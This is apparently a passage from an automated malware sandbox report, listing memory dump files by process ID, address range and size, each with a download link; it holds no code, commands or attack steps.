memory/2680-146-0x0000000000000000-mapping.dmp

Download
memory/2752-151-0x0000000000000000-mapping.dmp

Download
memory/2828-192-0x0000000000000000-mapping.dmp

Download
memory/2832-173-0x0000000000000000-mapping.dmp

Download
memory/2832-176-0x00007FFC9F660000-0x00007FFCA0121000-memory.dmp

Filesize
10.8MB

Download
memory/2832-178-0x00007FFC9F660000-0x00007FFCA0121000-memory.dmp

Filesize
10.8MB

Download
memory/3216-191-0x0000000000000000-mapping.dmp

Download
memory/3376-186-0x0000000000401BEA-mapping.dmp

Download
memory/3376-188-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/3376-185-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/3376-209-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/3488-171-0x00007FFC9F660000-0x00007FFCA0121000-memory.dmp

Filesize
10.8MB

Download
memory/3488-190-0x00000000019C0000-0x00000000019D2000-memory.dmp

Filesize
72KB

Download
memory/3488-197-0x00007FFC9F660000-0x00007FFCA0121000-memory.dmp

Filesize
10.8MB

Download
memory/3488-167-0x0000000000000000-mapping.dmp

Download
memory/3488-177-0x00007FFC9F660000-0x00007FFCA0121000-memory.dmp

Filesize
10.8MB

Download
memory/3508-154-0x0000000000000000-mapping.dmp

Download
memory/3624-153-0x0000000000000000-mapping.dmp

Download
memory/3728-199-0x0000000000000000-mapping.dmp

Download
memory/3924-204-0x0000000000000000-mapping.dmp

Download
memory/3964-203-0x0000000000000000-mapping.dmp

Download
memory/4116-200-0x0000000000000000-mapping.dmp

Download
memory/4196-160-0x0000000000000000-mapping.dmp

Download
memory/4212-145-0x0000000000000000-mapping.dmp

Download
memory/4388-144-0x0000000000000000-mapping.dmp

Download
memory/4464-202-0x0000000000000000-mapping.dmp

Download
memory/4484-184-0x0000000000000000-mapping.dmp

Download
memory/4520-207-0x0000000000000000-mapping.dmp

Download
memory/4580-132-0x0000000000710000-0x00000000008EC000-memory.dmp

Filesize
1.9MB

Download
memory/4580-135-0x00007FFC9F660000-0x00007FFCA0121000-memory.dmp

Filesize
10.8MB

Download
memory/4580-170-0x00007FFC9F660000-0x00007FFCA0121000-memory.dmp

Filesize
10.8MB

Download
memory/4580-139-0x00007FFC9F660000-0x00007FFCA0121000-memory.dmp

Filesize
10.8MB

Download
memory/4672-165-0x0000000000000000-mapping.dmp

Download
memory/4740-152-0x0000000000000000-mapping.dmp

Download
memory/4776-140-0x0000000000000000-mapping.dmp

Download
memory/4888-208-0x0000000000000000-mapping.dmp

Download
memory/4912-210-0x000002C053BD0000-0x000002C053BD7000-memory.dmp

Filesize
28KB

Download
memory/4912-211-0x00007FFC9F8A0000-0x00007FFCA0361000-memory.dmp

Filesize
10.8MB

Download
memory/4912-212-0x00007FFC9F8A0000-0x00007FFCA0361000-memory.dmp

Filesize
10.8MB

Download
memory/5008-164-0x0000000000000000-mapping.dmp

Download
memory/5020-172-0x0000000000000000-mapping.dmp

Download
memory/5036-150-0x0000000000000000-mapping.dmp

Download
memory/5060-183-0x0000000000000000-mapping.dmp

Download
memory/5100-156-0x0000000000000000-mapping.dmp

Download